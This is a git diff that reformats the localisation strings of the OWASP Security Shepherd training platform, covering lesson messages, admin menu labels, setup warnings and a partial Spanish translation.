+error.noSession = No session was detected with your request. Are you signed in?
+error.detected = An error was detected!
+error.shouldNotBeHere = You shouldn't be here!
+error.occured = Error Occurred: 
+error.notOpen = The Level is not open. Please ask the admin to open it before trying to continue. This is not \
   part of the game.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/csrfLesson.properties b/src/main/resources/i18n/servlets/lessons/csrfLesson.properties
index 6f79dda85..5e69f13e8 100644
--- a/src/main/resources/i18n/servlets/lessons/csrfLesson.properties
+++ b/src/main/resources/i18n/servlets/lessons/csrfLesson.properties
@@ -1,8 +1,10 @@
-result.wellDone=Well Done
-result.youDidIt=<p>The administrator received your message and submitted the GET request embedded in it's image
-result.theKeyIs=The result key for this lesson is
-challenge.messageSent=Message Sent
-challenge.sentTo=Sent To
-challenge.message=Message
-target.success=User Marked as completed CSRF Lesson
-target.notAdmin=You must be an administrator to perform this function
\ No newline at end of file
+result.wellDone = Well Done
+result.youDidIt = <p>The administrator received your message and submitted the GET request embedded in it's image
+result.theKeyIs = The result key for this lesson is
+
+challenge.messageSent = Message Sent
+challenge.sentTo = Sent To
+challenge.message = Message
+
+target.success = User Marked as completed CSRF Lesson
+target.notAdmin = You must be an administrator to perform this function
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/directObject.properties b/src/main/resources/i18n/servlets/lessons/directObject.properties
index 167b2a66c..4fd82472f 100644
--- a/src/main/resources/i18n/servlets/lessons/directObject.properties
+++ b/src/main/resources/i18n/servlets/lessons/directObject.properties
@@ -1,9 +1,10 @@
-response.user=User
-response.age=Age
-response.address=Address
-response.email=Email
-response.message=Private Message
-response.noMessage=No Private Message Set
-response.notFound=404 - User Not Found
-response.couldNotFind=could not be found or does not exist
-result.resultKey=Result Key
\ No newline at end of file
+response.user = User
+response.age = Age
+response.address = Address
+response.email = Email
+response.message = Private Message
+response.noMessage = No Private Message Set
+response.notFound = 404 - User Not Found
+response.couldNotFind = could not be found or does not exist
+
+result.resultKey = Result Key
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/poorValidation.properties b/src/main/resources/i18n/servlets/lessons/poorValidation.properties
index be92d648f..208968788 100644
--- a/src/main/resources/i18n/servlets/lessons/poorValidation.properties
+++ b/src/main/resources/i18n/servlets/lessons/poorValidation.properties
@@ -1,6 +1,7 @@
-result.validationBypassed=Validation Bypassed
-result.youDidIt=You defeated the lesson validation
-result.resultKey=Result Key
-response.validNumber=Valid Number Submitted
-response.theNumber=The Number
-response.valid=is a valid number
\ No newline at end of file
+result.validationBypassed = Validation Bypassed
+result.youDidIt = You defeated the lesson validation
+result.resultKey = Result Key
+
+response.validNumber = Valid Number Submitted
+response.theNumber = The Number
+response.valid = is a valid number
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties b/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties
index 8ec00f31e..9b03717d6 100644
--- a/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties
+++ b/src/main/resources/i18n/servlets/lessons/securityMisconfig.properties
@@ -1,7 +1,8 @@
-result.lessonComplete=Lesson Complete
-result.youDidIt=You have successfully signed in with the default sign in details for this applicaiton. You should always change default passwords and avoid default administration usernames.
-result.key=Result Key
-response.authError=Authentication Error
-response.authSuccess=Authentication Successful
-response.incorrectPassword=Incorrect Password Submitted
-response.noUserFound=No user records found for
\ No newline at end of file
+result.lessonComplete = Lesson Complete
+result.youDidIt = You have successfully signed in with the default sign in details for this applicaiton. You should always change default passwords and avoid default administration usernames.
+result.key = Result Key
+
+response.authError = Authentication Error
+response.authSuccess = Authentication Successful
+response.incorrectPassword = Incorrect Password Submitted
+response.noUserFound = No user records found for
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/sessionManagement.properties b/src/main/resources/i18n/servlets/lessons/sessionManagement.properties
index 1267911e8..6dc1ef865 100644
--- a/src/main/resources/i18n/servlets/lessons/sessionManagement.properties
+++ b/src/main/resources/i18n/servlets/lessons/sessionManagement.properties
@@ -1,4 +1,5 @@
-result.lessonComplete=Lesson Complete
-result.youDidIt=Congratulations, you have bypassed this lessons <strong><a>VERY WEAK</a></strong> session management. The result key for this lesson is
-response.lessonNotComplete=Lesson Not Complete
-response.youDidntDoIt=You have not completed this lesson yet.
\ No newline at end of file
+result.lessonComplete = Lesson Complete
+result.youDidIt = Congratulations, you have bypassed this lessons <strong><a>VERY WEAK</a></strong> session management. The result key for this lesson is
+
+response.lessonNotComplete = Lesson Not Complete
+response.youDidntDoIt = You have not completed this lesson yet.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/sqlInjection.properties b/src/main/resources/i18n/servlets/lessons/sqlInjection.properties
index a19eb8e56..a33615feb 100644
--- a/src/main/resources/i18n/servlets/lessons/sqlInjection.properties
+++ b/src/main/resources/i18n/servlets/lessons/sqlInjection.properties
@@ -1,5 +1,5 @@
-response.searchResults=Search Results
-response.noResults=No rows returned from that query! Make sure your <a>escaping</a> the string and changing the <a>boolean result</a> of the <a>WHERE</a> to be always true
-response.userId=User Id
-response.userName=User Name
-response.comment=Comment
\ No newline at end of file
+response.searchResults = Search Results
+response.noResults = No rows returned from that query! Make sure your <a>escaping</a> the string and changing the <a>boolean result</a> of the <a>WHERE</a> to be always true
+response.userId = User Id
+response.userName = User Name
+response.comment = Comment
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties b/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties
index 3a117baee..b5eae99c8 100644
--- a/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties
+++ b/src/main/resources/i18n/servlets/lessons/unvalidatedRedirect.properties
@@ -1,10 +1,12 @@
-result.wellDone=Well Done 
-result.youDidIt=The administrator received your message, clicked the link, and submitted the GET request automatically through the invalidated redirect
-result.resultKey=The result key for this lesson is
-response.messageSent=Message Sent
-response.sentTo=Sent To
-response.message=Message
-response.linkFrom=Link from
-target.example=Hardened Vulnerable Redirect example
-target.completed=User Marked as completed Redirect Lesson
-target.notAdmin=You must be an administrator to perform this function
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = The administrator received your message, clicked the link, and submitted the GET request automatically through the invalidated redirect
+result.resultKey = The result key for this lesson is
+
+response.messageSent = Message Sent
+response.sentTo = Sent To
+response.message = Message
+response.linkFrom = Link from
+
+target.example = Hardened Vulnerable Redirect example
+target.completed = User Marked as completed Redirect Lesson
+target.notAdmin = You must be an administrator to perform this function
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/xss.properties b/src/main/resources/i18n/servlets/lessons/xss.properties
index 083f72da8..5a3936ff1 100644
--- a/src/main/resources/i18n/servlets/lessons/xss.properties
+++ b/src/main/resources/i18n/servlets/lessons/xss.properties
@@ -1,5 +1,6 @@
-result.wellDone=Well Done 
-result.youDidIt=You successfully executed the JavaScript alert command!
-result.resultKey=The result key for this lesson is
-response.searchResults=Search Results
-response.noResults=Sorry but there were no results found that related to
\ No newline at end of file
+result.wellDone = Well Done 
+result.youDidIt = You successfully executed the JavaScript alert command!
+result.resultKey = The result key for this lesson is
+
+response.searchResults = Search Results
+response.noResults = Sorry but there were no results found that related to
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/lessons/xxe.properties b/src/main/resources/i18n/servlets/lessons/xxe.properties
index 6bc95c945..9a512bea0 100644
--- a/src/main/resources/i18n/servlets/lessons/xxe.properties
+++ b/src/main/resources/i18n/servlets/lessons/xxe.properties
@@ -1,3 +1,3 @@
-response.invalid.email=Invalid email address
-response.blank.email=Email must not be blank
-response.success.reset=The password has been reset for
\ No newline at end of file
+response.invalid.email = Invalid email address
+response.blank.email = Email must not be blank
+response.success.reset = The password has been reset for
\ No newline at end of file
diff --git a/src/main/resources/i18n/text.properties b/src/main/resources/i18n/text.properties
index c1abe191e..c7993ee31 100644
--- a/src/main/resources/i18n/text.properties
+++ b/src/main/resources/i18n/text.properties
@@ -1,138 +1,146 @@
-generic.text.aboutSecShep=About Security Shepherd
-generic.text.admin=Admin
-generic.text.cheat=Cheat
-generic.text.challenges=Challenges
-generic.text.assignments=Assignments
-generic.text.commentMessage.1=You are currently looking at the core server.
-generic.text.commentMessage.2=Nothing related to the levels in Security Shepherd will be found in here.
-generic.text.commentMessage.3=You might be looking for the iframe embedded in the page.
-generic.text.commentMessage.4=Try a tool like Firebug to make this stuff easier.
-generic.text.configuration=Configuration
-generic.text.configureShepherd=Configure Shepherd
-generic.text.confirmPasswd=Confirm Password
-generic.text.confirmEmailAddr=Confirm Email
-generic.text.emailAddr=Email Address
-generic.text.lessons=Lessons
-generic.text.login=Login
-generic.text.logout=Logout
-generic.text.loading=Loading...
-generic.text.ssRegister=OWASP Security Shepherd - Register
-generic.text.password=Password
-generic.text.pleaseWait=Please Wait!
-generic.text.register=Register
-generic.text.scoreboard=Scoreboard
-generic.text.searchModules=Search Modules
-generic.text.shepherdVersion=Security Shepherd Version: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=Submit Result Key Here
-generic.text.submit=Submit
-generic.text.username=Username
-generic.text.welcome=Welcome
-generic.text.copy.to.clip=Copy to clipboard
-generic.text.setup.title=No Database Configuration
-generic.text.setup.description=Security Shepherd has not detected a database configuration file. Use this form to configure your database server.
-generic.text.setup.enable.mongodb=Enable NoSQL Challenge
-generic.text.setup.enable.unsafe=Enable Unsafe Challenges
-generic.text.setup.enable.unsafe.warn=[WARNING] Your host will be vulnerable with this enabled
-generic.text.setup.form.title=Set Database Properties
-generic.text.setup.token.title=Configuration Authentication Token
-generic.text.setup.token.description=To use this function you must collect an authentication token from the server's file system. Collect it from this path;
-generic.text.setup.host=Hostname
-generic.text.setup.port=Port
-generic.text.setup.user=DB Username
-generic.text.setup.pwd=DB Password
-generic.text.setup.wipe=Fresh Database
-generic.text.setup.dontwipe=Do not override
-generic.text.setup.upgrade=Update from v3.0
-generic.text.setup.authentication=Authentication token
-generic.text.setup.authentication.help=Please paste the content from the following file into the field
-generic.text.setup.overridedb=Override Databases
-generic.text.setup.authentication.failed=Authentication failure. Please paste the content of the SecurityShepherd.auth file into the authentication field.
-generic.text.setup.connection.failed=Failed to make Connection to Database.
-generic.text.setup.connection.mongo.failed=Failed to make Connection to Mongo DB.
-generic.text.setup.success=Database has been successfully configured.
-generic.text.setup.success.overwrittendb=Database was overwritten and restored to the default Security Shepherd state.
-generic.text.setup.success.updatedb=Database was updated from a previous Security Shepherd install.
-generic.text.setup.failed=Failed setting up the database
-generic.text.setup.file.failed=Failed to create file for unsafe levels
-generic.text.setup.file.success=Created file for unsafe levels
-generic.text.setup.response.success=Database Configuration Complete
-generic.text.setup.response.success.redirecting=Redirecting you to the login page...
-generic.text.setup.response.failed=Database Configuration Failed
-generic.text.setup.error.valid.port=The port you entered is invalid. It must be between 1 and 65535
-getter.button.completed=Completed
-getter.button.nextChallenge=Get Next Challenge
-getter.button.finished=You've Finished!
-getter.button.noModulesFound=No Modules Found
-getter.tournamentRank.1=Field Training
-getter.tournamentRank.2=Private
-getter.tournamentRank.3=Corporal
-getter.tournamentRank.4=Sergeant
-getter.tournamentRank.5=Lieutenant
-getter.tournamentRank.6=Major
-getter.tournamentRank.7=Admiral
-getStarted.text.lets_start=Let's Get Started
-getStarted.button.openLevels.all=Open All Levels
-getStarted.button.openLevels.web=Open Web App Levels Only
-getStarted.button.openLevels.mobile=Open Mobile Levels Only
-getStarted.button.closeLevels=Close All Levels
-getStarted.button.enable.unsafe=Enable Unsafe Levels
-getStarted.enable.unsafe.info=[WARNING] - Your server will become vulnerable with these levels enabled
-blockedMessage.text.heading.levelBlocked=Level Currently Blocked
-index.link.admin.cheatSheet.manage=Cheat Sheet Management
-index.link.admin.cheatSheet.manage.create=Create New Cheat Sheet
-index.link.admin.cheatSheet.manage.disable=Disable Cheat Sheets
-index.link.admin.cheatSheet.manage.enable=Enable Cheat Sheets
-index.link.admin.config.change=Change Module Layout
-index.link.admin.config.feedback=Feedback Configuration
-index.link.admin.config.openClose=Open/Close Registration
-index.link.admin.config.scoreboard=Scoreboard Configuration
-index.link.admin.config.coreDb=Set Core Database
-index.link.admin.moduleManage=Module Management
-index.link.admin.moduleManage.block=Module Block Setup
-index.link.admin.moduleManage.openClose=Open and Close Modules
-index.link.admin.moduleManage.openCloseCategory=Open or Close by Category
-index.link.admin.moduleManage.feedback=View Feedback
-index.link.admin.moduleManage.progress=View Progress
-index.link.admin.userMange=User Management
-index.link.admin.userMange.addPlayer=Add Players
-index.link.admin.userMange.deletePlayer=Delete Players
-index.link.admin.userMange.addPoints=Add / Deduct Player Points
-index.link.admin.userMange.assignPlayer=Assign Players to Class
-index.link.admin.userMange.createClass=Create Class
-index.link.admin.userMange.createAdmin=Create New Admin
-index.link.admin.userMange.resetPass=Reset Password
-index.link.admin.userMange.setDefaultPlayerClass=Set Default Player Class
-index.link.admin.userMange.suspendPlayer=Suspend Player
-index.link.admin.userMange.unsuspendPlayer=Undo Suspend Player
-index.link.admin.userMange.upgradeToAdmin=Upgrade Player to Admin
-index.link.admin.userMange.downgradeToPlayer=Downgrade Admin to Player
-login.text.sponsers=Project Sponsors
-readyToPlay.title.readyToPlay=Security Shepherd - Ready to Go?
-readyToPlay.header.notReady=You're not ready!
-readyToPlay.title.enteredGame=You have entered the game!
-login.text.proxy_question=Do you need a Proxy?
-login.text.download_proxy=Download a HTTP Proxy here
-login.link.zap_win=ZAP for Windows
-login.link.zap_lin=ZAP for Linux
-login.link.zap_mac=ZAP for Mac
-blockedMessage.text.info.levelBlocked=Your doing very well! An administrator has currently marked this level as closed. To find out when this level will be available, your going to have to ask the person who is in charge on the application!
-getStarted.text.moduleInfo.openFloor=Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, <span><a>Lessons</a></span> or <span><a>Modules</a></span>, in the side menu to see what modules are currently available!
-getStarted.text.moduleInfo.incrementalFloor=Now that you have signed in, lets get started with some Security Shepherd challenges! To start one, click the &quot;Get Next Challenge&quot; button on the left!
-getStarted.text.moduleInfo=Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as <span><a>Field Training</a></span> or <span><a>Corporal</a></span>, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
-getStarted.text.configureShepherd.asAnAdmin=As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
-getStarted.text.checkShepConfigMsg=If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
-getStarted.text.info.changePassword=Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
-getStarted.text.info.changeUsername=You have the option to change your username here. This username will be shown publicly on the scoreboard.
-login.text.info=Use your <a><span>Security Shepherd Credentials<span></a> to Login.
-login.text.regInfo=Register a <a href="register.jsp"><span>Security Shepherd Account</span></a> here!
-login.text.scoreboard=View the <a href="scoreboard.jsp"><span>scoreboard</span></a>.
-login.text.about_blurb=The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
-login.text.sponsers_blurb=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
-login.text.thanks=The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
-readyToPlay.text.info.notReady=Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
-readyToPlay.text.info.enteredGame=Now that you can see this, you're good to go! Get cracking on lessons and challenges! <br/><br/> Remember, the levels you are playing are sub applications. Keep the game play in these applications!  Stay away from your session ID's! You'll just log yourself out of you change them!<br/><br/> If you havn't already configured a web proxy, you better! It makes things much easier!
-module.generic.owasp.guide.to=OWASP Guide to
+generic.text.aboutSecShep = About Security Shepherd
+generic.text.admin = Admin
+generic.text.cheat = Cheat
+generic.text.challenges = Challenges
+generic.text.assignments = Assignments
+generic.text.commentMessage.1 = You are currently looking at the core server.
+generic.text.commentMessage.2 = Nothing related to the levels in Security Shepherd will be found in here.
+generic.text.commentMessage.3 = You might be looking for the iframe embedded in the page.
+generic.text.commentMessage.4 = Try a tool like Firebug to make this stuff easier.
+generic.text.configuration = Configuration
+generic.text.configureShepherd = Configure Shepherd
+generic.text.confirmPasswd = Confirm Password
+generic.text.confirmEmailAddr = Confirm Email
+generic.text.emailAddr = Email Address
+generic.text.lessons = Lessons
+generic.text.login = Login
+generic.text.logout = Logout
+generic.text.loading = Loading...
+generic.text.ssRegister = OWASP Security Shepherd - Register
+generic.text.password = Password
+generic.text.pleaseWait = Please Wait!
+generic.text.register = Register
+generic.text.scoreboard = Scoreboard
+generic.text.searchModules = Search Modules
+generic.text.shepherdVersion = Security Shepherd Version: 3.0
+generic.text.sorryError = Sorry but there was an error
+generic.text.submitResult = Submit Result Key Here
+generic.text.submit = Submit
+generic.text.username = Username
+generic.text.welcome = Welcome
+generic.text.copy.to.clip = Copy to clipboard
+generic.text.setup.title = No Database Configuration
+generic.text.setup.description = Security Shepherd has not detected a database configuration file. Use this form to configure your database server.
+generic.text.setup.enable.mongodb = Enable NoSQL Challenge
+generic.text.setup.enable.unsafe = Enable Unsafe Challenges
+generic.text.setup.enable.unsafe.warn = [WARNING] Your host will be vulnerable with this enabled
+generic.text.setup.form.title = Set Database Properties
+generic.text.setup.token.title = Configuration Authentication Token
+generic.text.setup.token.description = To use this function you must collect an authentication token from the server's file system. Collect it from this path;
+generic.text.setup.host = Hostname
+generic.text.setup.port = Port
+generic.text.setup.user = DB Username
+generic.text.setup.pwd = DB Password
+generic.text.setup.wipe = Fresh Database
+generic.text.setup.dontwipe = Do not override
+generic.text.setup.upgrade = Update from v3.0
+generic.text.setup.authentication = Authentication token
+generic.text.setup.authentication.help = Please paste the content from the following file into the field
+generic.text.setup.overridedb = Override Databases
+generic.text.setup.authentication.failed = Authentication failure. Please paste the content of the SecurityShepherd.auth file into the authentication field.
+generic.text.setup.connection.failed = Failed to make Connection to Database.
+generic.text.setup.connection.mongo.failed = Failed to make Connection to Mongo DB.
+generic.text.setup.success = Database has been successfully configured.
+generic.text.setup.success.overwrittendb = Database was overwritten and restored to the default Security Shepherd state.
+generic.text.setup.success.updatedb = Database was updated from a previous Security Shepherd install.
+generic.text.setup.failed = Failed setting up the database
+generic.text.setup.file.failed = Failed to create file for unsafe levels
+generic.text.setup.file.success = Created file for unsafe levels
+generic.text.setup.response.success = Database Configuration Complete
+generic.text.setup.response.success.redirecting = Redirecting you to the login page...
+generic.text.setup.response.failed = Database Configuration Failed
+generic.text.setup.error.valid.port = The port you entered is invalid. It must be between 1 and 65535
+
+getter.button.completed = Completed
+getter.button.nextChallenge = Get Next Challenge
+getter.button.finished = You've Finished!
+getter.button.noModulesFound = No Modules Found
+getter.tournamentRank.1 = Field Training
+getter.tournamentRank.2 = Private
+getter.tournamentRank.3 = Corporal
+getter.tournamentRank.4 = Sergeant
+getter.tournamentRank.5 = Lieutenant
+getter.tournamentRank.6 = Major
+getter.tournamentRank.7 = Admiral
+
+getStarted.text.lets_start = Let's Get Started
+getStarted.button.openLevels.all = Open All Levels
+getStarted.button.openLevels.web = Open Web App Levels Only
+getStarted.button.openLevels.mobile = Open Mobile Levels Only
+getStarted.button.closeLevels = Close All Levels
+getStarted.button.enable.unsafe = Enable Unsafe Levels
+getStarted.enable.unsafe.info = [WARNING] - Your server will become vulnerable with these levels enabled
+blockedMessage.text.heading.levelBlocked = Level Currently Blocked
+index.link.admin.cheatSheet.manage = Cheat Sheet Management
+index.link.admin.cheatSheet.manage.create = Create New Cheat Sheet
+index.link.admin.cheatSheet.manage.disable = Disable Cheat Sheets
+index.link.admin.cheatSheet.manage.enable = Enable Cheat Sheets
+index.link.admin.config.change = Change Module Layout
+index.link.admin.config.feedback = Feedback Configuration
+index.link.admin.config.openClose = Open/Close Registration
+index.link.admin.config.scoreboard = Scoreboard Configuration
+index.link.admin.config.coreDb = Set Core Database
+index.link.admin.moduleManage = Module Management
+index.link.admin.moduleManage.block = Module Block Setup
+index.link.admin.moduleManage.openClose = Open and Close Modules
+index.link.admin.moduleManage.openCloseCategory = Open or Close by Category
+index.link.admin.moduleManage.feedback = View Feedback
+index.link.admin.moduleManage.progress = View Progress
+index.link.admin.userMange = User Management
+index.link.admin.userMange.addPlayer = Add Players
+index.link.admin.userMange.deletePlayer = Delete Players
+index.link.admin.userMange.addPoints = Add / Deduct Player Points
+index.link.admin.userMange.assignPlayer = Assign Players to Class
+index.link.admin.userMange.createClass = Create Class
+index.link.admin.userMange.createAdmin = Create New Admin
+index.link.admin.userMange.resetPass = Reset Password
+index.link.admin.userMange.setDefaultPlayerClass = Set Default Player Class
+index.link.admin.userMange.suspendPlayer = Suspend Player
+index.link.admin.userMange.unsuspendPlayer = Undo Suspend Player
+index.link.admin.userMange.upgradeToAdmin = Upgrade Player to Admin
+index.link.admin.userMange.downgradeToPlayer = Downgrade Admin to Player
+login.text.sponsers = Project Sponsors
+readyToPlay.title.readyToPlay = Security Shepherd - Ready to Go?
+readyToPlay.header.notReady = You're not ready!
+readyToPlay.title.enteredGame = You have entered the game!
+login.text.proxy_question = Do you need a Proxy?
+login.text.download_proxy = Download a HTTP Proxy here
+
+
+login.link.zap_win = ZAP for Windows
+login.link.zap_lin = ZAP for Linux
+login.link.zap_mac = ZAP for Mac
+
+
+blockedMessage.text.info.levelBlocked = Your doing very well! An administrator has currently marked this level as closed. To find out when this level will be available, your going to have to ask the person who is in charge on the application!
+getStarted.text.moduleInfo.openFloor = Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, <span><a>Lessons</a></span> or <span><a>Modules</a></span>, in the side menu to see what modules are currently available!
+getStarted.text.moduleInfo.incrementalFloor = Now that you have signed in, lets get started with some Security Shepherd challenges! To start one, click the &quot;Get Next Challenge&quot; button on the left!
+getStarted.text.moduleInfo = Now that you have signed in, lets get started with some Security Shepherd modules! To start a module, click on the list headers, such as <span><a>Field Training</a></span> or <span><a>Corporal</a></span>, in the side menu to see what modules are currently available! The lower down in the side menu that the module is listed, the more points it is worth!
+getStarted.text.configureShepherd.asAnAdmin = As you are an Administrator you can define the scope of Security Shepherd. You can quickly change the game layout to Web or Mobile Application focused with the following buttons, or you can open the Admin Module Management menu, at the top left of the page, to open or close specific topics.
+getStarted.text.checkShepConfigMsg = If you cannot see the message below this paragraph, please ensure that the Security Shepherd instance is correctly configured.
+getStarted.text.info.changePassword = Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
+getStarted.text.info.changeUsername = You have the option to change your username here. This username will be shown publicly on the scoreboard.
+login.text.info = Use your <a><span>Security Shepherd Credentials<span></a> to Login.
+login.text.regInfo = Register a <a href="register.jsp"><span>Security Shepherd Account</span></a> here!
+login.text.scoreboard = View the <a href="scoreboard.jsp"><span>scoreboard</span></a>.
+login.text.about_blurb = The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use. </p><p>The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Please check out their web pages and follow them on twitter.
+login.text.thanks = The OWASP Security Shepherd Project would also like to thank Dr. Anthony Keane and the ITB Security Research Lab for hosting the public https://owasp.securityShepherd.eu
+readyToPlay.text.info.notReady = Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
+readyToPlay.text.info.enteredGame = Now that you can see this, you're good to go! Get cracking on lessons and challenges! <br/><br/> Remember, the levels you are playing are sub applications. Keep the game play in these applications!  Stay away from your session ID's! You'll just log yourself out of you change them!<br/><br/> If you havn't already configured a web proxy, you better! It makes things much easier!
+
+module.generic.owasp.guide.to = OWASP Guide to
 module.generic.owasp.more.info=For more information please visit
-sponsorship.title=Project Sponsors
-sponsorship.message.1=The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Security Shepherd would not exist as it does today without them. Please check out their web pages and follow them on twitter.
+
+sponsorship.title = Project Sponsors
+sponsorship.message.1 = The OWASP Security Shepherd project would like to acknowledge and thank the generous support of our sponsors. Security Shepherd would not exist as it does today without them. Please check out their web pages and follow them on twitter.
diff --git a/src/main/resources/i18n/text_es.properties b/src/main/resources/i18n/text_es.properties
index eed14778b..3d1aad04b 100644
--- a/src/main/resources/i18n/text_es.properties
+++ b/src/main/resources/i18n/text_es.properties
@@ -1,41 +1,45 @@
-generic.text.aboutSecShep=Sobre Security Shepherd
-generic.text.admin=Administración
-generic.text.cheat=Hacer trampas
-generic.text.challenges=Desafíos
-generic.text.commentMessage.1=Estás mirando en el servidor central.
-generic.text.commentMessage.2=Aquí no hay nada relacionado con los niveles de Security Sheperd.
-generic.text.commentMessage.3=Puede que estés buscando el iframe incorporado (embedded iframe) en la página.
-generic.text.commentMessage.4=Prueba una herramienta como Firebug para hacer esto más fácil.
-generic.text.configuration=Configuración
-generic.text.configureShepherd=Configure Shepherd
-generic.text.confirmPasswd=Confirmar Contraseña
-generic.text.confirmEmailAddr=Confirmar Correo Electrónico
-generic.text.emailAddr=Dirección de correo electrónico
-generic.text.lessons=Lecciones
-generic.text.login=Acceder
-generic.text.logout=Cerrar Sesión
-generic.text.loading=Cargando...Engañar
-generic.text.ssRegister=OWASP Security Shepherd - Registro
-generic.text.password=Contraseña
-generic.text.pleaseWait=Por favor, espera!
-generic.text.register=Registro
-generic.text.scoreboard=Marcador
-generic.text.searchModules=Buscar módulos
-generic.text.shepherdVersion=Security Shepherd Version: 3.0
-generic.text.sorryError=Sorry but there was an error
-generic.text.submitResult=Submit Result Key Here
-generic.text.username=Nombre de usario
-generic.text.welcome=Bienvenida
-getter.button.nextChallenge=Conseguir el próximo Desafío
-login.text.info=Utilice su <a> <span> Credenciales de Security Shepherd <span> </a> a inicio.
-login.text.regInfo=Registrar la <a href="register.jsp"> <span> Cuenta Security Shepherd </ span> </a> aquí!
-login.text.proxy_question=¿Necesita un proxy?
-login.text.about_blurb=El proyecto OWASP Security Shepherd se ha diseñado e implementado con el objetivo de fomentar y mejorar el conocimiento de seguridad de aplicaciones entre un variado conjunto de habilidades demográfica. Este proyecto permite a los usuarios aprender o mejorar en las habilidades de pruebas de penetración manuales existentes. Esto se logra a través de técnicas de lecciones y de desafío. Una lección proporciona al usuario una gran cantidad de ayuda en la realización de ese módulo, donde un desafío pone lo que el usuario aprendido en la lección de usar. </ P> <p> La OWASP Security Shepherd proyecto abarca los diez primeros OWASP riesgos de aplicaciones web y también cubre los diez riesgos móviles OWASP también. El uso de estos riesgos como un banco de pruebas desafío, las vulnerabilidades de seguridad comunes pueden ser explorados y su impacto en un sistema entendidos. Muchos de estos niveles incluyen mitigaciones insuficientes y protecciones a estos riesgos, como los filtros de la lista negra, esquemas de codificación atroces, los mecanismos de seguridad de barbarie y de la configuración de seguridad pobres. Los módulos han sido concebidos para ofrecer no sólo un reto para un novato de seguridad, pero los profesionales de seguridad también.
-login.text.download_proxy=Descarga un Proxy HTTP aquí
-login.link.zap_win=ZAP para Windows
-login.link.zap_lin=ZAP para Linux
-login.link.zap_mac=ZAP para Mac
-login.text.sponsers=Los patrocinadores del proyecto
-login.text.sponsers_blurb=TEl proyecto OWASP Security Shepherd desea reconocer y agradecer el generoso apoyo de nuestros patrocinadores. Por favor revise sus páginas web y seguirlos en Twitter.
-login.text.thanks=La OWASP Security Shepherd Proyecto también quisiera agradecer al Dr. Anthony Keane y el laboratorio de investigación de la ITB de Seguridad para acoger al público https://owasp.securityShepherd.eu
-getStarted.text.lets_start=Empecemos
\ No newline at end of file
+generic.text.aboutSecShep = Sobre Security Shepherd
+generic.text.admin = Administración
+generic.text.cheat = Hacer trampas
+generic.text.challenges = Desafíos
+generic.text.commentMessage.1 = Estás mirando en el servidor central.
+generic.text.commentMessage.2 = Aquí no hay nada relacionado con los niveles de Security Sheperd.
+generic.text.commentMessage.3 = Puede que estés buscando el iframe incorporado (embedded iframe) en la página.
+generic.text.commentMessage.4 = Prueba una herramienta como Firebug para hacer esto más fácil.
+generic.text.configuration = Configuración
+generic.text.configureShepherd = Configure Shepherd
+generic.text.confirmPasswd = Confirmar Contraseña
+generic.text.confirmEmailAddr = Confirmar Correo Electrónico
+generic.text.emailAddr = Dirección de correo electrónico
+generic.text.lessons = Lecciones
+generic.text.login = Acceder
+generic.text.logout = Cerrar Sesión
+generic.text.loading = Cargando...Engañar
+generic.text.ssRegister = OWASP Security Shepherd - Registro
+generic.text.password = Contraseña
+generic.text.pleaseWait = Por favor, espera!
+generic.text.register = Registro
+generic.text.scoreboard = Marcador
